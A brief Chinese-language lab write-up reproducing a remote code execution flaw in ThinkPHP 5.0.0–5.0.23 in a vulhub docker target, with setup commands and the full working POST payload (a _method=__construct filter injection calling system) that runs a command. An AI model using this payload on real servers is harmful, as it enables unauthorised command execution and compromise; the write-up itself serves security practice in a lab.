影响版本
ThinkPHP版本 5.0.0~5.0.23
漏洞实验环境
靶机:Ubuntu虚拟机
攻击机:Windows10
开启vulhub靶场-打开docker
cd vulhub/thinkphp/2-rce
docker-compose up -d
通过docker ps 查看开放端口为8080
通过输入 错误url地址信息得到ThinkPHP版本信息——V 5.0.23
利用网上payload测试,通过hackbar插件直接打post包
url:http://172.18.128.169:8080/index.php?s=captcha
post:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
命令执行成功